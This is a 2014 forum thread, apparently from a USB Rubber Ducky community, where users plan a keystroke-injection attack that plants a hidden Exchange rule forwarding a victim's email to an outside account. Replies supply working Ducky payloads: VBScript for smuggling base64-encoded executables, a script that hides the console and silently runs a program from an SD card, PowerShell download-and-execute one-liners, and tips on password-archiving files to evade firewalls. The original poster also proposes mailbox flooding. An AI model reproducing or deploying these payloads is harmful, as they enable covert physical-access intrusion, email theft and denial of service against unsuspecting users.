KSI_Syn Posted May 4, 2014 Share Posted May 4, 2014 So I was working on some powershell-Fu for a customer to restrict e-mails with specific keywords in the e-mail body or subject line from being delivered to a mobile device. In this effort I developed a script that creates hidden rules in exchange that are unable to be detected in the exchange management shell by an admin or in microsoft Outlook by the user. I also wrote a second tool to detect view and delete these hidden rules. What I would like to do is adapt this for the USB Ducky where when the duck is inserted it runs a script that injects a hidden mailbox rule that will auto forward all e-mails received by the user to a specified account. The difficulty here is that the script requires a dll that extends the standard MAPI32.dll that comes with Outlook or the MAPI CDO installer. I am looking for suggestions on the best way to approach getting the dll on the system during the duck script execution. I am considering the Twin Duck firmware ( HID + Mass Storage ) option to see if i could copy the dll to a tmp folder prior to running the script and if i were to do that i would also like to copy the ps1 file so i would just open powershell copy the 2 files to tmp launch the Ps1 from tmp dir and then delete the dir and walk off. any suggestions would be welcome Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 4, 2014 Share Posted May 4, 2014 (edited) Well, I remember there used to be a payload that would encode an exe to base 64, or something like that, and then on inject would convert it back, I don't know if the process can be applied to dll's. Exe's and dll's tend to be relatively large in terms of ducks, and would take minutes to inject. Another problem with this method is that some of the firmware has a limit on the size of the payload. Here is some code related to the process: 'File: Base64encode.vbs Option Explicit ' common consts Const TypeBinary = 1 Const ForReading = 1, ForWriting = 2, ForAppending = 8 ' getting file from args (no checks!) Dim arguments, inFile, outFile Set arguments = WScript.Arguments inFile = arguments(0) outFile = arguments(1) Dim inByteArray, base64Encoded, base64Decoded, outByteArray inByteArray = readBytes(inFile) base64Encoded = encodeBase64(inByteArray) Dim myFSO, WriteStuff Set myFSO = CreateObject("Scripting.FileSystemObject") Set WriteStuff = myFSO.OpenTextFile(outFile, ForAppending, True) WriteStuff.WriteLine(base64Encoded) WriteStuff.Close private function readBytes(file) dim inStream ' ADODB stream object used set inStream = WScript.CreateObject("ADODB.Stream") ' open with no arguments makes the stream an empty container inStream.Open inStream.type= TypeBinary inStream.LoadFromFile(file) readBytes = inStream.Read() end function private function encodeBase64(bytes) dim DM, EL Set DM = CreateObject("Microsoft.XMLDOM") ' Create temporary node with Base64 data type Set EL = DM.createElement("tmp") EL.DataType = "bin.base64" ' Set bytes, get encoded String EL.NodeTypedValue = bytes encodeBase64 = EL.Text end function REM DECODE THE BASE 64 ENCODED TEXT USING A VB SCRIPT STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe ENTER REM RUN THE RESULTING EXECUTABLE STRING HelloWorld.exe ENTER One other option is to simply take a USB drive with you, and run a script with the ducky that detects the drive's insertion and copy's the dll off the drive to a specified location. That RunEXE from sd payload usually works, and in fact works best when used in this way, because the memory on the duck tends to be a little bit slow. You could literally bring a small 2 port hub, and then plug the ducky and the drive in simultaneously in that manner. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Another option is to download a file from online using a bit of powershell. You could archive the dll with a password, and then it would be undetectable via firewall. The only problem with this route is that you need install privileges to install the archive tool, unless there is something already on site. Here is a bit of duck code that will download and install 7zip: REM *** Navigate to %TEMP%. *** STRING cd %TEMP% ENTER REM *** Delete 7zip files if they already exist. *** STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt ENTER REM *** Install 7zip. *** STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\' DELAY 500 ENTER REM *** Delay 7 Seconds. *** DELAY 7000 REM *** Switch from powershell back to command line. *** STRING CMD ENTER Mubix wrote this: GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER I have noticed that many computers don't allow powershell script files to be run by default. You usually have to break the code up into something that can be run from the command prompt. And somebody explain to me how to use those show/hide boxes in posts! I cannot find the button, and these code boxes are making my post too long! Edited May 4, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 10, 2014 Share Posted May 10, 2014 So I just figured out what base64 is. You see I had learned about it from somebody else, so I didn't fully understand the concept. Base64 and UUEncode are algorithms used in sending emails that convert binary files into a text format. Quote Link to comment Share on other sites More sharing options...
KSI_Syn Posted May 10, 2014 Author Share Posted May 10, 2014 I think the idea with the 2 port hub may work best in this case then i could install the DLL and use duck script to run the powershell commands line by line in interactive mode, rather than trying to use a ps1 and have the PS execution policy to deal with. I Bet This could also be adapted to eat up mailbox resources as well by setting the recipient of the message to the user or setup an auto reply on the box that is receiving the message to send messages with random garbage attachments Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 10, 2014 Share Posted May 10, 2014 I think it may also be possible to embed powershell commands in batch files if you need to. Don't quote me on that one though. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.